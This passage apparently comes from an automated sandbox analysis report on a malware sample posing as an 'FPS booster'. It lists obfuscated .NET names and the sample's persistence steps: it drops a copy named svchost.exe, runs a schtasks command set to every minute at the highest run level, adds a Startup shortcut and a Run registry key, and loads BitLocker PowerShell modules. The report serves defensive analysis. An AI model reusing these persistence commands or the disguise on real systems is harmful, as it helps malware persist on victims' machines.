                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.csHigh entropy of concatenated method names: 'Bqr9IApmOTP4nl7Vt7e9zCVwOIzyM1affYfK', 'ePFHuDJi8YM5vgvRtm4d8P3bIVS5ZoRQufO5', 'RDQeaHUygmLZ4XlSIQDW2JEoPsWqBfTJplew', 'XDTQpIlZmBdbgOxqPX6S59wFMtenm0S4ygPM', '_6NU4mk3vmSnGJ60tIcKynuFbayPh8B6MKfSR', 'Gzl9UVEXWKpfugyYZH8JHiZw7riCJHbIYGGx', 'yv237CSvGbeP3sVaYuovmEocUT3HDMM60hip', 'jMdrQxh8jarANIUZWoYIkVBWPqR9sHCVcH85', 'hRwg9qRUbT20SboWQNk9EHmjP589muWAfD8V', '_2KGgiMKOtakioIjRKfHvGo5radn0LNEq0JBU'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.csHigh entropy of concatenated method names: 'KUGRFX7NzbXI3dF0wrdURHUtG0zaBv88MtAS', 'tOO2Z8qOEgWLfHluOXChWdvCxwZiRsOYCgklHDjJBFONK6jcyMxSe8mQaa', 'd9waWOcLbOPbOe7dEsf7sOhuxOMofzlxq6uBRjro1Ofq4CfDh2t003LpId', 'mguuZjrCd716Ke7x2VaTOvT9C267EXZyAd9iIiRhKZgFpLUCSZFb0OMsBr', 'KFKupFPsRoJOg7guPRcWmBr92jiEr24qAscLgapCeBrOyl3xdjl5qIJDiHuKuJuaLwZmH2hAbbEuo5WeCPH3KoMVf5Q'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 8IQB900HXYRJQlSr78JTfor2tc.csHigh entropy of concatenated method names: 'TKQFizhs2lVNjSAlf0Q6tXZS9v', 'GLvUvE5Lbzlydp5PY3jqcSPc2C', 'UGiY4f3pvEofg6Iulz9u3CYCfe', 'tsAJnLIXUMiQta7muY5V2eRXUJYTBobZmSC8woLmV1ABLMNiJKCx2FA7ILp', 'XgS9lV9wP0OGaskWn9Y4U2tdyyY0ScMgnWouvmgUBtf78ym6Hm0dmLmg6Bc', 'NCQJtvrYdEzQevyWWGgB99RksUoSpZE67tNLNlksT40uqOvu7xHCWbWxxrD', 'qSCmv1R3jGNemiDUTJ474IWiQCSfBTDKtnLSfE04Sqm5yTJvS7wcZPfnEX5', 'r4fxv6B01YN2ArbEBxeUYIRc0wVYyAE29pUS9HqR705MNSu9fieq70gGc8Q', 'JH4TehWKGyhxn5JmfBZY4DPaSj4jwTSOdvroJu197cOXlTXsXW3yP18w2P7', 'YBXKyVGqnUX5Mj4MuhZCDMMKfYCfR8W4TJapIts56pYaISM0WSIA8XRveMM'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, C3tzO69S7Io0iqQUFZ.csHigh entropy of concatenated method names: 'n9L1SiSEKnOJLPTxOX', 'EdBvOJPjc5U4FwQjZPHehC50grzSW4u0TEwsTvnjg', 'KvIjvXDwWu1qObxmvBuHAnLOlPZ5cVMT9DKAREzuB', 'TWEQgKKNlYxIV2sXjt3GXoQHItjA7DOEipgMvF6G8', '_6kBkFN74HE0ZoUbVwwgfs9Ac7Loe5XbCdg0hpnRMx'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.csHigh entropy of concatenated method names: 'YLBldLktCgFxThvN3oxSQ7feTLXUeDESnntmrT7ODqPx', 'txd84qUAtgwYBo9hQ59Qx4WG76651dxKXzDgjQ4RQjNl', 'DFIl5zQJ9Msj8WXgFZlHlDi4yEdc04TaUxEaDb7Y7PxZ', 'RMTYoFcDRWXDbOJy8TYimVj3U1FCB7brlYSUefzw1g3a', 'NnvXBw8RFHbkMePGrLNQdXa5TAnrdnZu2QVIin3vo2mi', '_6nBIcXOrZOwCX0Qc7WU3lRESKofh470ADvsaGoaVdV97', 'C5FyNGPKc9mEwULry8gJ9d5YWdaA6qzxna3qRkyZaZBE', 'jfY0sMtntiNWfzbhmZ9M7BrBRw844THn8sm8wArbNBV4', 'vVaYHCq4glB5AHmXJ7Jtg5uBfww3j21bhxiAxnwh7PWb', '_4aDgrCBIP20LRSew2k3GkegkMNmpKebAwjrrBjmXFy4i'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 7JvHuWPw1GACQFV6RkGOPBlb2yE8r5a5qayCygvYw9HkC6ls1bwfCuTp8eL7K7yAXlVdxclqrSk5bcvZT2QmhwOVf97ctC.csHigh entropy of concatenated method names: 'HTgL90ABMji8QHmbo3nJuM4cUcC0fXQjBtEKZexQI8EGW8SShhROfFbjk3KSm20q60evJLiweHt8kiQNONhRhYdkZzwFWr', '_1mBzvp4cKSuOZksJRJnqpOopSrVYJ83f8Sjc', 'pOndutOPfJ53dQtjcy1aV3cT75K6Si0zBS5C', '_9cYhnzdcVkH81UksXA1GBmOtmUpqremzL8pn', '_7j5fffhqLEYuO8KzIcszij2w6ldIu94YG4Fl6fx2CcVVUnTKZBHIi4pTaJ', 'YTL7nT9jYE47vjLOWFsGpQLCuJtclTzNf4E1iwxBMs6ipah79j1QamQskK', '_71MnawkND25UImg5RD8vnC6d9aHxHxZTuWVzhJnMTYaqXoxXTOiVmaKL8J', 'TJ1FZdlbjXCZFX1IPpa1c3qAKhddtgauOzJCNgYoI2Ir3AZqppeBPub0H9', 'tjgCwv0QJ4BVSD9kaFIeI8jz56aW67sB6nV49xAfgDpKCPWJXUHXeDMKYs', 'tJbvRiG4i7af79ROK8siEac83raDF0n1DsB9y8YDAkoFe1to0GVorRnfHV'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, fTao5gWD0t2iSxXg7i.csHigh entropy of concatenated method names: 'qI9aCiC0DxmzgxmHI0', 'cOuY6dyf6DfrDzWT3y', 'PLaqPXtPvSAygMwypD', '_1sn6RRw7e5kdfUFxZE', 'iVJBOz249xWFhoHIO5', 'YhnePqRO3hAfnGAzIS', 'p5KZLqACgdwca7gTXh', 'Q2ZPJVjtIoVG6rIKfV', 'iOyNtBPWFmH5jVtghW', 'IRWFiTmFGLsH6shGQN'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.csHigh entropy of concatenated method names: 'TKwaZYczhZHeBkBjnC4FAoU1v6oSYDF5GuLQljhkge5uI2tFXsXoeVQTeYMP6QThAP9cnTqcITBz', 'GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR', '_8EDhV4r1m7ktQq4wQR3GzHqoSSy9jPDSM5qcZqWUVNQVP2yHPxCPV4qBisoqGQn3hPC4t0y2pPaE', 'yTPMF1iSmPRXuB72iFyBMmvVRxKRIk4nSoc9ux8matyalFmlvtS5KcQxAU5xsuSBrEG1f1NvolnF', 'UkmrxZXoVvHGSMGrciskGfNrY1Cl1cjtirYftIpYUvqGiFuiCUIEkmv6Q9fOWmqguYzYxC4IKbtr', '_4QG4gsJdGffwuq0L0kkGpUCrDdilwejzvTlcNpw2kcGK50CttEoy8lwAPt8MvWn5NORrjOwDQONb', '_7UhVED4iIc67RFsqbWeRiBO0nBAGIOEjIygEnOyqcNspHHxLOE9M8be4KmOxADoce37HKdvMctaB', 'bWMXJsCBt7jOLGkTUsnkg6yDt8xKZGhW1i7k8HVoLIwGuzsI22J1zcHROwWFNBv2qDzVvE4f3nx8', '_965r8GGj19n7G4kv0H', 'UsdMBU6FoXifoBBCSC'

                  Persistence and Installation Behavior

                  barindex
                  Drops PE files with benign system names
                  Source: C:\Users\user\Desktop\BoostFPS.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\BoostFPS.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
